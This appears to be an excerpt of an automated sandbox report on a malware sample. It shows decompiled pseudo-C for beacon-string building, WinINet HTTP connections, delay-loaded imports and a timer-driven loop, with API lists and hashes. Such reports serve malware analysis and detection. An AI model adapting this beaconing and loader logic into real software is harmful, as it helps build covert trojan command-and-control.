                                          • Opcode Fuzzy Hash: 7a12e46de81385406117bb51a9dc433ccdf37569311cf95d112ce140b254f5ac
                                          • Instruction Fuzzy Hash: 80F05E313005169BC720DF59CC88E9BBBF8FB05754B2141A4E905DB2A1D730ED95CBE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 68%
                                          			E0489636D(long __eax, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a20, intOrPtr _a24) {
                                          				intOrPtr _v0;
                                          				intOrPtr _v4;
                                          				void* _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				intOrPtr _v52;
                                          				void* __ecx;
                                          				void* __edi;
                                          				long _t29;
                                          				intOrPtr _t30;
                                          				intOrPtr _t31;
                                          				intOrPtr _t32;
                                          				intOrPtr _t33;
                                          				intOrPtr _t34;
                                          				void* _t37;
                                          				intOrPtr _t38;
                                          				int _t41;
                                          				void* _t42;
                                          				intOrPtr _t46;
                                          				intOrPtr _t47;
                                          				intOrPtr _t54;
                                          				intOrPtr _t58;
                                          				intOrPtr* _t60;
                                          				void* _t61;
                                          				intOrPtr _t66;
                                          				intOrPtr _t72;
                                          				intOrPtr _t75;
                                          				intOrPtr _t78;
                                          				int _t81;
                                          				intOrPtr _t82;
                                          				int _t85;
                                          				intOrPtr _t87;
                                          				int _t90;
                                          				intOrPtr _t92;
                                          				int _t95;
                                          				intOrPtr* _t97;
                                          				intOrPtr* _t98;
                                          				void* _t99;
                                          				void* _t103;
                                          				void* _t104;
                                          				void* _t105;
                                          				intOrPtr _t106;
                                          				void* _t108;
                                          				int _t109;
                                          				void* _t110;
                                          				void* _t111;
                                          				void* _t113;
                                          				void* _t114;
                                          				void* _t116;
                                          
                                          				_t103 = __edx;
                                          				_t29 = __eax;
                                          				_t113 = _a20;
                                          				_v4 = 8;
                                          				if(__eax == 0) {
                                          					_t29 = GetTickCount();
                                          				}
                                          				_t30 =  *0x489a018; // 0x2682f32c
                                          				asm("bswap eax");
                                          				_t31 =  *0x489a014; // 0x3a87c8cd
                                          				asm("bswap eax");
                                          				_t32 =  *0x489a010; // 0xd8d2f808
                                          				asm("bswap eax");
                                          				_t33 =  *0x489a00c; // 0x8f8f86c2
                                          				asm("bswap eax");
                                          				_t34 =  *0x489a348; // 0x9ad5a8
                                          				_t3 = _t34 + 0x489b633; // 0x74666f73
                                          				_t109 = wsprintfA(_t113, _t3, 2, 0x3d173, _t33, _t32, _t31, _t30,  *0x489a02c,  *0x489a004, _t29);
                                          				_t37 = E04893F1E();
                                          				_t38 =  *0x489a348; // 0x9ad5a8
                                          				_t4 = _t38 + 0x489b673; // 0x74707526
                                          				_t41 = wsprintfA(_t109 + _t113, _t4, _t37);
                                          				_t116 = _t114 + 0x38;
                                          				_t110 = _t109 + _t41;
                                          				if(_a24 != 0) {
                                          					_t92 =  *0x489a348; // 0x9ad5a8
                                          					_t8 = _t92 + 0x489b67e; // 0x732526
                                          					_t95 = wsprintfA(_t110 + _t113, _t8, _a24);
                                          					_t116 = _t116 + 0xc;
                                          					_t110 = _t110 + _t95; // executed
                                          				}
                                          				_t42 = E04891567(_t99); // executed
                                          				_t104 = _t42;
                                          				if(_t104 != 0) {
                                          					_t87 =  *0x489a348; // 0x9ad5a8
                                          					_t10 = _t87 + 0x489b8d4; // 0x736e6426
                                          					_t90 = wsprintfA(_t110 + _t113, _t10, _t104);
                                          					_t116 = _t116 + 0xc;
                                          					_t110 = _t110 + _t90;
                                          					HeapFree( *0x489a2d8, 0, _t104);
                                          				}
                                          				_t105 = E04893268();
                                          				if(_t105 != 0) {
                                          					_t82 =  *0x489a348; // 0x9ad5a8
                                          					_t12 = _t82 + 0x489b8dc; // 0x6f687726
                                          					_t85 = wsprintfA(_t110 + _t113, _t12, _t105);
                                          					_t116 = _t116 + 0xc;
                                          					_t110 = _t110 + _t85;
                                          					HeapFree( *0x489a2d8, 0, _t105);
                                          				}
                                          				_t106 =  *0x489a3cc; // 0x52495b0
                                          				_a24 = E04895D1C(0x489a00a, _t106 + 4);
                                          				_t46 =  *0x489a370; // 0x0
                                          				if(_t46 != 0) {
                                          					_t78 =  *0x489a348; // 0x9ad5a8
                                          					_t15 = _t78 + 0x489b8b6; // 0x3d736f26
                                          					_t81 = wsprintfA(_t110 + _t113, _t15, _t46);
                                          					_t116 = _t116 + 0xc;
                                          					_t110 = _t110 + _t81;
                                          				}
                                          				_t47 =  *0x489a36c; // 0x0
                                          				if(_t47 != 0) {
                                          					_t75 =  *0x489a348; // 0x9ad5a8
                                          					_t17 = _t75 + 0x489b88d; // 0x3d706926
                                          					wsprintfA(_t110 + _t113, _t17, _t47);
                                          				}
                                          				if(_a24 != 0) {
                                          					_t108 = RtlAllocateHeap( *0x489a2d8, 0, 0x800);
                                          					if(_t108 != 0) {
                                          						E04893950(GetTickCount());
                                          						_t54 =  *0x489a3cc; // 0x52495b0
                                          						__imp__(_t54 + 0x40);
                                          						asm("lock xadd [eax], ecx");
                                          						_t58 =  *0x489a3cc; // 0x52495b0
                                          						__imp__(_t58 + 0x40);
                                          						_t60 =  *0x489a3cc; // 0x52495b0
                                          						_t61 = E04893739(1, _t103, _t113,  *_t60); // executed
                                          						_t111 = _t61;
                                          						asm("lock xadd [eax], ecx");
                                          						if(_t111 != 0) {
                                          							StrTrimA(_t111, 0x489928c);
                                          							_push(_t111);
                                          							_t66 = E04893970();
                                          							_a12 = _t66;
                                          							if(_t66 != 0) {
                                          								_t97 = __imp__;
                                          								 *_t97(_t111, _v0);
                                          								 *_t97(_t108, _v4);
                                          								_t98 = __imp__;
                                          								 *_t98(_t108, _v0);
                                          								 *_t98(_t108, _t111);
                                          								_t72 = E04895347(0xffffffffffffffff, _t108, _v24, _v20); // executed
                                          								_v52 = _t72;
                                          								if(_t72 != 0 && _t72 != 0x10d2) {
                                          									E04893F62();
                                          								}
                                          								HeapFree( *0x489a2d8, 0, _v16);
                                          							}
                                          							HeapFree( *0x489a2d8, 0, _t111);
                                          						}
                                          						RtlFreeHeap( *0x489a2d8, 0, _t108); // executed
                                          					}
                                          					HeapFree( *0x489a2d8, 0, _a16);
                                          				}
                                          				RtlFreeHeap( *0x489a2d8, 0, _t113); // executed
                                          				return _a4;
                                          			}

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 04896383
                                          • wsprintfA.USER32 ref: 048963D0
                                          • wsprintfA.USER32 ref: 048963ED
                                          • wsprintfA.USER32 ref: 0489640F
                                          • wsprintfA.USER32 ref: 04896432
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04896442
                                          • wsprintfA.USER32 ref: 04896464
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04896474
                                          • wsprintfA.USER32 ref: 048964AB
                                          • wsprintfA.USER32 ref: 048964CB
                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 048964E8
                                          • GetTickCount.KERNEL32 ref: 048964F8
                                          • RtlEnterCriticalSection.NTDLL(05249570), ref: 0489650C
                                          • RtlLeaveCriticalSection.NTDLL(05249570), ref: 0489652A
                                            • Part of subcall function 04893739: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,7477C740,?,?,0489653D,?,052495B0), ref: 04893764
                                            • Part of subcall function 04893739: lstrlen.KERNEL32(?,?,?,0489653D,?,052495B0), ref: 0489376C
                                            • Part of subcall function 04893739: strcpy.NTDLL ref: 04893783
                                            • Part of subcall function 04893739: lstrcat.KERNEL32(00000000,?), ref: 0489378E
                                            • Part of subcall function 04893739: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,0489653D,?,052495B0), ref: 048937AB
                                          • StrTrimA.SHLWAPI(00000000,0489928C,?,052495B0), ref: 0489655C
                                            • Part of subcall function 04893970: lstrlen.KERNEL32(05249B90,00000000,00000000,7477C740,04896568,00000000), ref: 04893980
                                            • Part of subcall function 04893970: lstrlen.KERNEL32(?), ref: 04893988
                                            • Part of subcall function 04893970: lstrcpy.KERNEL32(00000000,05249B90), ref: 0489399C
                                            • Part of subcall function 04893970: lstrcat.KERNEL32(00000000,?), ref: 048939A7
                                          • lstrcpy.KERNEL32(00000000,?), ref: 0489657B
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04896582
                                          • lstrcat.KERNEL32(00000000,?), ref: 0489658F
                                          • lstrcat.KERNEL32(00000000,00000000), ref: 04896593
                                            • Part of subcall function 04895347: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,76DC81D0), ref: 048953F9
                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 048965C3
                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 048965D2
                                          • RtlFreeHeap.NTDLL(00000000,00000000,?,052495B0), ref: 048965E1
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 048965F3
                                          • RtlFreeHeap.NTDLL(00000000,?), ref: 04896602
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
• Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$Freewsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                          • String ID:
                                          • API String ID: 1892477351-0
                                          • Opcode ID: 1fadef82fe9ab4a346923b39495ccb50eb2a0e27fc95db555076dde278fc4fc9
                                          • Instruction ID: ab4e2fc67311b075dcedb2141a8c7cb7c637bf1756c8dafe44d6ad3a3f80b6b8
                                          • Opcode Fuzzy Hash: 1fadef82fe9ab4a346923b39495ccb50eb2a0e27fc95db555076dde278fc4fc9
                                          • Instruction Fuzzy Hash: B67161B1600A41AFDB15ABA8EC48F5637E8FB48744F0C0E18F905D7260EF79ED05AB65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          • SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,00B63ED5), ref: 00B544F7
                                          • RtlDeleteCriticalSection.NTDLL(00B79400), ref: 00B5452A
                                          • RtlDeleteCriticalSection.NTDLL(00B79420), ref: 00B54531
                                          • ReleaseMutex.KERNEL32(000005AC,00000000,?,?,?,00B63ED5), ref: 00B5455A
                                          • FindCloseChangeNotification.KERNEL32(?,?,00B63ED5), ref: 00B54566
                                          • ResetEvent.KERNEL32(00000000,00000000,?,?,?,00B63ED5), ref: 00B54572
                                          • CloseHandle.KERNEL32(?,?,00B63ED5), ref: 00B5457E
                                          • SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,00B63ED5), ref: 00B54584
                                          • SleepEx.KERNEL32(00000064,00000001,?,?,00B63ED5), ref: 00B54598
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,00B63ED5), ref: 00B545BC
                                          • RtlRemoveVectoredExceptionHandler.NTDLL(02BB05B8), ref: 00B545F2
                                          • SleepEx.KERNEL32(00000064,00000001,?,?,00B63ED5), ref: 00B5460E
                                          • FindCloseChangeNotification.KERNEL32(0614F2C8,?,?,00B63ED5), ref: 00B54637
                                          • LocalFree.KERNEL32(?,?,00B63ED5), ref: 00B54647
                                            • Part of subcall function 00B574F5: GetVersion.KERNEL32(?,?,76DDF720,?,00B544E6,00000000,?,?,?,00B63ED5), ref: 00B57519
                                            • Part of subcall function 00B574F5: GetModuleHandleA.KERNEL32(?,061497B5,?,76DDF720,?,00B544E6,00000000,?,?,?,00B63ED5), ref: 00B57536
                                            • Part of subcall function 00B574F5: GetProcAddress.KERNEL32(00000000), ref: 00B5753D
                                            • Part of subcall function 00B59A58: RtlEnterCriticalSection.NTDLL(00B79420), ref: 00B59A62
                                            • Part of subcall function 00B59A58: RtlLeaveCriticalSection.NTDLL(00B79420), ref: 00B59A9E
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalSectionSleep$Close$ChangeDeleteFindFreeHandleNotification$AddressEnterEventExceptionHandlerHeapLeaveLocalModuleMutexProcReleaseRemoveResetVectoredVersion
                                          • String ID:
                                          • API String ID: 1259384122-0
                                          • Opcode ID: ab4c6a23489f30f00f91deb231056e323ffed6d845b367d9c46a252bb1e04d6e
                                          • Instruction ID: 03f0bd13b972daa48ea0d004cf5ef36f8cdb1e2f31baf44383a5e71a9eeb43dc
                                          • Opcode Fuzzy Hash: ab4c6a23489f30f00f91deb231056e323ffed6d845b367d9c46a252bb1e04d6e
                                          • Instruction Fuzzy Hash: 8F418031700252AFDB20AF65EC89B5537E8EB10716B8500E5FA08E76A0DF71DCE4CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 92%
                                          			E04897A71(void* __eax, void* __ecx, long __esi, char* _a4) {
                                          				void _v8;
                                          				long _v12;
                                          				void _v16;
                                          				void* _t34;
                                          				void* _t38;
                                          				void* _t40;
                                          				char* _t56;
                                          				long _t57;
                                          				void* _t58;
                                          				intOrPtr _t59;
                                          				long _t65;
                                          
                                          				_t65 = __esi;
                                          				_t58 = __ecx;
                                          				_v16 = 0xea60;
                                          				__imp__( *(__esi + 4));
                                          				_v12 = __eax + __eax;
                                          				_t56 = E04894DF6(__eax + __eax + 1);
                                          				if(_t56 != 0) {
                                          					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
                                          						E04894C73(_t56);
                                          					} else {
                                          						E04894C73( *(__esi + 4));
                                          						 *(__esi + 4) = _t56;
                                          					}
                                          				}
                                          				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
                                          				 *(_t65 + 0x10) = _t34;
                                          				if(_t34 == 0 || InternetSetStatusCallback(_t34, E04897A06) == 0xffffffff) {
                                          					L15:
                                          					return GetLastError();
                                          				} else {
                                          					ResetEvent( *(_t65 + 0x1c));
                                          					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x50, 0, 0, 3, 0, _t65); // executed
                                          					 *(_t65 + 0x14) = _t38;
                                          					if(_t38 != 0 || GetLastError() == 0x3e5 && E04893A6F( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
                                          						_t59 =  *0x489a348; // 0x9ad5a8
                                          						_t15 = _t59 + 0x489b743; // 0x544547
                                          						_v8 = 0x84404000;
                                          						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84404000, _t65); // executed
                                          						 *(_t65 + 0x18) = _t40;
                                          						if(_t40 == 0) {
                                          							goto L15;
                                          						}
                                          						_t57 = 4;
                                          						_v12 = _t57;
                                          						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
                                          							_v8 = _v8 | 0x00000100;
                                          							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
                                          						}
                                          						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
                                          							goto L15;
                                          						} else {
                                          							return 0;
                                          						}
                                          					} else {
                                          						goto L15;
                                          					}
                                          				}
                                          			}


                                          APIs
                                          • lstrlen.KERNEL32(?,00000008,76D84D40), ref: 04897A83
                                            • Part of subcall function 04894DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04895522), ref: 04894E02
                                          • InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 04897AA6
                                          • InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 04897ACE
                                          • InternetSetStatusCallback.WININET(00000000,04897A06), ref: 04897AE5
                                          • ResetEvent.KERNEL32(?), ref: 04897AF7
                                          • InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 04897B0A
                                          • GetLastError.KERNEL32 ref: 04897B17
                                          • HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 04897B5D
                                          • InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 04897B7B
                                          • InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 04897B9C
                                          • InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 04897BA8
                                          • InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 04897BB8
                                          • GetLastError.KERNEL32 ref: 04897BC2
                                            • Part of subcall function 04894C73: RtlFreeHeap.NTDLL(00000000,00000000,048955C4,00000000,?,?,00000000), ref: 04894C7F
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
• Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
                                          • String ID:
                                          • API String ID: 2290446683-0
                                          • Opcode ID: c00a5eb98782da59e172fa76290a6bc5c5b26f5612bfc81c0c465bfec178f152
                                          • Instruction ID: e49471f540f1dc1c0a614be10e1542f390e1ccaea71d6d159217fe5cca49d44e
                                          • Opcode Fuzzy Hash: c00a5eb98782da59e172fa76290a6bc5c5b26f5612bfc81c0c465bfec178f152
                                          • Instruction Fuzzy Hash: C4414C71600A44FFDB319FA9DC48EAB7BF9EB45B04B184E29F542D1190EB75AE44CB20
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 51%
                                          			E04897EB5(long _a4, long _a8) {
                                          				signed int _v8;
                                          				intOrPtr _v16;
                                          				LONG* _v28;
                                          				long _v40;
                                          				long _v44;
                                          				long _v48;
                                          				CHAR* _v52;
                                          				long _v56;
                                          				CHAR* _v60;
                                          				long _v64;
                                          				signed int* _v68;
                                          				char _v72;
                                          				signed int _t76;
                                          				signed int _t80;
                                          				signed int _t81;
                                          				intOrPtr* _t82;
                                          				intOrPtr* _t83;
                                          				intOrPtr* _t85;
                                          				intOrPtr* _t90;
                                          				intOrPtr* _t95;
                                          				intOrPtr* _t98;
                                          				struct HINSTANCE__* _t99;
                                          				void* _t102;
                                          				intOrPtr* _t104;
                                          				void* _t115;
                                          				long _t116;
                                          				void _t125;
                                          				void* _t131;
                                          				signed short _t133;
                                          				struct HINSTANCE__* _t138;
                                          				signed int* _t139;
                                          
                                          				_t139 = _a4;
                                          				_v28 = _t139[2] + 0x4890000;
                                          				_t115 = _t139[3] + 0x4890000;
                                          				_t131 = _t139[4] + 0x4890000;
                                          				_v8 = _t139[7];
                                          				_v60 = _t139[1] + 0x4890000;
                                          				_v16 = _t139[5] + 0x4890000;
                                          				_v64 = _a8;
                                          				_v72 = 0x24;
                                          				_v68 = _t139;
                                          				_v56 = 0;
                                          				asm("stosd");
                                          				_v48 = 0;
                                          				_v44 = 0;
                                          				_v40 = 0;
                                          				if(( *_t139 & 0x00000001) == 0) {
                                          					_a8 =  &_v72;
                                          					RaiseException(0xc06d0057, 0, 1,  &_a8);
                                          					return 0;
                                          				}
                                          				_t138 =  *_v28;
                                          				_t76 = _a8 - _t115 >> 2 << 2;
                                          				_t133 =  *(_t131 + _t76);
                                          				_a4 = _t76;
                                          				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                                          				_v56 = _t80;
                                          				_t81 = _t133 + 0x4890002;
                                          				if(_t80 == 0) {
                                          					_t81 = _t133 & 0x0000ffff;
                                          				}
                                          				_v52 = _t81;
                                          				_t82 =  *0x489a1c0; // 0x0
                                          				_t116 = 0;
                                          				if(_t82 == 0) {
                                          					L6:
                                          					if(_t138 != 0) {
                                          						L18:
                                          						_t83 =  *0x489a1c0; // 0x0
                                          						_v48 = _t138;
                                          						if(_t83 != 0) {
                                          							_t116 =  *_t83(2,  &_v72);
                                          						}
                                          						if(_t116 != 0) {
                                          							L32:
                                          							 *_a8 = _t116;
                                          							L33:
                                          							_t85 =  *0x489a1c0; // 0x0
                                          							if(_t85 != 0) {
                                          								_v40 = _v40 & 0x00000000;
                                          								_v48 = _t138;
                                          								_v44 = _t116;
                                          								 *_t85(5,  &_v72);
                                          							}
                                          							return _t116;
                                          						} else {
                                          							if(_t139[5] == _t116 || _t139[7] == _t116) {
                                          								L27:
                                          								_t116 = GetProcAddress(_t138, _v52);
                                          								if(_t116 == 0) {
                                          									_v40 = GetLastError();
                                          									_t90 =  *0x489a1bc; // 0x0
                                          									if(_t90 != 0) {
                                          										_t116 =  *_t90(4,  &_v72);
                                          									}
                                          									if(_t116 == 0) {
                                          										_a4 =  &_v72;
                                          										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                                          										_t116 = _v44;
                                          									}
                                          								}
                                          								goto L32;
                                          							} else {
                                          								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                                          								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                                          									_t116 =  *(_a4 + _v16);
                                          									if(_t116 != 0) {
                                          										goto L32;
                                          									}
                                          								}
                                          								goto L27;
                                          							}
                                          						}
                                          					}
                                          					_t98 =  *0x489a1c0; // 0x0
                                          					if(_t98 == 0) {
                                          						L9:
                                          						_t99 = LoadLibraryA(_v60); // executed
                                          						_t138 = _t99;
                                          						if(_t138 != 0) {
                                          							L13:
                                          							if(InterlockedExchange(_v28, _t138) == _t138) {
                                          								FreeLibrary(_t138);
                                          							} else {
                                          								if(_t139[6] != 0) {
                                          									_t102 = LocalAlloc(0x40, 8);
                                          									if(_t102 != 0) {
                                          										 *(_t102 + 4) = _t139;
                                          										_t125 =  *0x489a1b8; // 0x0
                                          										 *_t102 = _t125;
                                          										 *0x489a1b8 = _t102;
                                          									}
                                          								}
                                          							}
                                          							goto L18;
                                          						}
                                          						_v40 = GetLastError();
                                          						_t104 =  *0x489a1bc; // 0x0
                                          						if(_t104 == 0) {
                                          							L12:
                                          							_a8 =  &_v72;
                                          							RaiseException(0xc06d007e, 0, 1,  &_a8);
                                          							return _v44;
                                          						}
                                          						_t138 =  *_t104(3,  &_v72);
                                          						if(_t138 != 0) {
                                          							goto L13;
                                          						}
                                          						goto L12;
                                          					}
                                          					_t138 =  *_t98(1,  &_v72);
                                          					if(_t138 != 0) {
                                          						goto L13;
                                          					}
                                          					goto L9;
                                          				}
                                          				_t116 =  *_t82(0,  &_v72);
                                          				if(_t116 != 0) {
                                          					goto L33;
                                          				}
                                          				goto L6;
                                          			}

                                          APIs
                                          • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 04897F2E
                                          • LoadLibraryA.KERNEL32(?), ref: 04897FAB
                                          • GetLastError.KERNEL32 ref: 04897FB7
                                          • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 04897FEA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                          • String ID: $
                                          • API String ID: 948315288-3993045852
                                          • Opcode ID: 0ad713d0263d20ff31aab4037b2cf9f6d302afe60e08fa762a5ecfa3ea441373
                                          • Instruction ID: 7ff3a14df98de0b50ccd01e63f9b7b277a93d4db6629e1c029f9c4feb9914f29
                                          • Opcode Fuzzy Hash: 0ad713d0263d20ff31aab4037b2cf9f6d302afe60e08fa762a5ecfa3ea441373
                                          • Instruction Fuzzy Hash: EE813D71A10A06AFDF14EF99D880AADB7F4FB48700F188929E915E7340EB74ED05CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 83%
                                          			E04896B13(void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                          				void _v48;
                                          				long _v52;
                                          				struct %anon52 _v60;
                                          				char _v72;
                                          				long _v76;
                                          				void* _v80;
                                          				union _LARGE_INTEGER _v84;
                                          				struct %anon52 _v92;
                                          				void* _v96;
                                          				void* _v100;
                                          				union _LARGE_INTEGER _v104;
                                          				long _v108;
                                          				struct %anon52 _v124;
                                          				long _v128;
                                          				struct %anon52 _t46;
                                          				void* _t51;
                                          				long _t53;
                                          				void* _t54;
                                          				struct %anon52 _t61;
                                          				long _t65;
                                          				struct %anon52 _t66;
                                          				intOrPtr _t68;
                                          				void* _t69;
                                          				void* _t73;
                                          				signed int _t74;
                                          				void* _t76;
                                          				void* _t78;
                                          				void** _t82;
                                          				signed int _t86;
                                          				void* _t89;
                                          
                                          				_t76 = __edx;
                                          				_v52 = 0;
                                          				memset( &_v48, 0, 0x2c);
                                          				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
                                          				_t46 = CreateWaitableTimerA(0, 1, 0);
                                          				_v60 = _t46;
                                          				if(_t46 == 0) {
                                          					_v92.HighPart = GetLastError();
                                          				} else {
                                          					_push(0xffffffff);
                                          					_push(0xff676980);
                                          					_push(0);
                                          					_push( *0x489a2e0);
                                          					_v76 = 0;
                                          					_v80 = 0;
                                          					L048981CA();
                                          					_v84.LowPart = _t46;
                                          					_v80 = _t76;
                                          					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
                                          					_t51 =  *0x489a30c; // 0x2cc
                                          					_v76 = _t51;
                                          					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
                                          					_v108 = _t53;
                                          					if(_t53 == 0) {
                                          						if(_a8 != 0) {
                                          							L4:
                                          							 *0x489a2ec = 5;
                                          						} else {
                                          							_t69 = E048967E2(_t76); // executed
                                          							if(_t69 != 0) {
                                          								goto L4;
                                          							}
                                          						}
                                          						_v104.LowPart = 0;
                                          						L6:
                                          						if(_v104.LowPart == 1 && ( *0x489a300 & 0x00000001) == 0) {
                                          							_v104.LowPart = 2;
                                          						}
                                          						_t74 = _v104.LowPart;
                                          						_t58 = _t74 << 4;
                                          						_t78 = _t89 + (_t74 << 4) + 0x38;
                                          						_t75 = _t74 + 1;
                                          						_v92.LowPart = _t74 + 1;
                                          						_t61 = E04895803( &_v96, _t75, _t78, _t75, _t89 + _t58 + 0x38, _t78,  &_v100); // executed
                                          						_v124 = _t61;
                                          						if(_t61 != 0) {
                                          							goto L17;
                                          						}
                                          						_t66 = _v92;
                                          						_v104.LowPart = _t66;
                                          						if(_t66 != 3) {
                                          							goto L6;
                                          						} else {
                                          							_t68 = E048929F2(_t75,  &_v72, _a4, _a8); // executed
                                          							_v124.HighPart = _t68;
                                          						}
                                          						goto L12;
                                          						L17:
                                          						__eflags = _t61 - 0x10d2;
                                          						if(_t61 != 0x10d2) {
                                          							_push(0xffffffff);
                                          							_push(0xff676980);
                                          							_push(0);
                                          							_push( *0x489a2e4);
                                          							goto L21;
                                          						} else {
                                          							__eflags =  *0x489a2e8; // 0x0
                                          							if(__eflags == 0) {
                                          								goto L12;
                                          							} else {
                                          								_t61 = E04893F62();
                                          								_push(0xffffffff);
                                          								_push(0xdc3cba00);
                                          								_push(0);
                                          								_push( *0x489a2e8);
                                          								L21:
                                          								L048981CA();
                                          								_v104.LowPart = _t61;
                                          								_v100 = _t78;
                                          								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
                                          								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
                                          								_v128 = _t65;
                                          								__eflags = _t65;
                                          								if(_t65 == 0) {
                                          									goto L6;
                                          								} else {
                                          									goto L12;
                                          								}
                                          							}
                                          						}
                                          						L25:
                                          					}
                                          					L12:
                                          					_t82 =  &_v72;
                                          					_t73 = 3;
                                          					do {
                                          						_t54 =  *_t82;
                                          						if(_t54 != 0) {
                                          							RtlFreeHeap( *0x489a2d8, 0, _t54); // executed
                                          						}
                                          						_t82 =  &(_t82[4]);
                                          						_t73 = _t73 - 1;
                                          					} while (_t73 != 0);
                                          					CloseHandle(_v80);
                                          				}
                                          				return _v92.HighPart;
                                          				goto L25;
                                          			}
                                          0x04896c35
                                          0x04896c39
                                          0x04896c43
                                          0x04896c43
                                          0x04896c49
                                          0x04896c4c
                                          0x04896c4c
                                          0x04896c53
                                          0x04896c53
                                          0x04896cda
                                          0x00000000

                                          APIs
                                          • memset.NTDLL ref: 04896B2D
                                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 04896B39
